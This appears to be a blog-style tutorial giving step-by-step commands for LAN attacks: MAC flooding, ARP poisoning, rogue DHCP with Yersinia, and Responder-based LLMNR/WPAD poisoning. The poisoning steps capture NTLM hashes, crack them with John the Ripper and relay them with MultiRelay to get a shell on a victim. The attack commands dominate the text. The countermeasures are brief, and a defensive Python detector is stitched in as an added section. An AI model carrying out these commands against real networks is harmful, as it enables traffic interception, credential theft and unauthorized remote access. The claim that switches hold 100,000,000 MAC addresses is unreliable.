1) MAC Flooding
Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can be used to fill the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.
Countermeasure:
- Port Security to limit the number of MAC addresses (PCs) learned on each port
- IEEE 802.1X, requiring connected PCs to authenticate their identities before being granted access
- MAC Filtering, allowing only authorized MAC addresses to communicate
2) ARP Poisoning
In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage Wireshark to capture the confidential information.
More details can be found in the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html
Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage switch security features such as Cisco DHCP Snooping and Dynamic ARP Inspection
3) DHCP Spoofing
Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch a DHCP Starvation attack in order to exhaust the address pool of the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER key to launch the DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget to turn off the firewall, if any.
Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-like systems to detect DHCP Starvation attacks
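As an added defender-side example (not code from the original post or its linked documents), the following Python script implements the kind of monitoring the countermeasures above describe: it flags an IP address whose ARP mapping flips to a different MAC, as happens to 192.168.0.1 during ARP poisoning, and a burst of DHCP DISCOVER messages from many distinct MACs, the signature of DHCP starvation. The events are constructed sample data; on a real network they would be parsed from a capture.

```python
from collections import deque

# Constructed sample events (not a real capture). Each tuple is
# (time_s, proto, src_mac, detail): for "arp" the detail is the sender IP
# claimed in an ARP reply; for "dhcp" it is the DHCP message type.
EVENTS = [
    (0.0, "arp", "aa:bb:cc:00:00:01", "192.168.0.1"),  # real gateway answers
    (0.5, "arp", "aa:bb:cc:00:00:07", "192.168.0.7"),  # victim answers
    (2.0, "arp", "de:ad:be:ef:00:99", "192.168.0.1"),  # new MAC claims the gateway IP
    (2.1, "arp", "de:ad:be:ef:00:99", "192.168.0.7"),  # same MAC claims the victim IP
    (3.0, "arp", "aa:bb:cc:00:00:01", "192.168.0.1"),  # real gateway answers again
]
# 60 DHCP DISCOVERs from 60 different client MACs within three seconds (constructed)
EVENTS += [(5.0 + i * 0.05, "dhcp", "02:00:00:00:%02x:%02x" % (i >> 8, i & 0xff), "DISCOVER")
           for i in range(60)]


def detect_arp_flips(events):
    """arpwatch-style check: alert whenever an IP changes the MAC it maps to."""
    ip_to_mac = {}
    alerts = []
    for t, proto, mac, ip in events:
        if proto != "arp":
            continue
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": t, "ip": ip, "old_mac": prev, "new_mac": mac})
        ip_to_mac[ip] = mac
    return alerts


def detect_dhcp_starvation(events, window_s=10.0, threshold=50):
    """Alert once when >= threshold distinct client MACs send DISCOVER within window_s."""
    window = deque()          # (time, mac) pairs inside the current sliding window
    alerts = []
    for t, proto, mac, msg in events:
        if proto != "dhcp" or msg != "DISCOVER":
            continue
        window.append((t, mac))
        while window and t - window[0][0] > window_s:
            window.popleft()
        distinct = {m for _, m in window}
        if len(distinct) >= threshold and not alerts:   # report the burst once
            alerts.append({"time": t, "distinct_macs": len(distinct)})
    return alerts


if __name__ == "__main__":
    for a in detect_arp_flips(EVENTS) + detect_dhcp_starvation(EVENTS):
        print("ALERT", a)
```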
4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)
Scenario #1:
When someone in the same Windows domain makes a typo with a nonexistent hostname, the following command will capture the request and answer it with a fake response in order to obtain that user's username and password hash.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply John the Ripper to the captured hash as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt
Scenario #2:
If the PCs in the Windows network have WPAD enabled for configuring proxy settings, the WPAD listener can be enabled to trick the PCs' owners into typing their passwords; the attacker then obtains the passwords without cracking anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb
Scenario #3:
The MultiRelay function of Responder can be applied when SMB Signing is disabled on the victim's PC.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 -u ALL
Countermeasure:
- Enable SMB Signing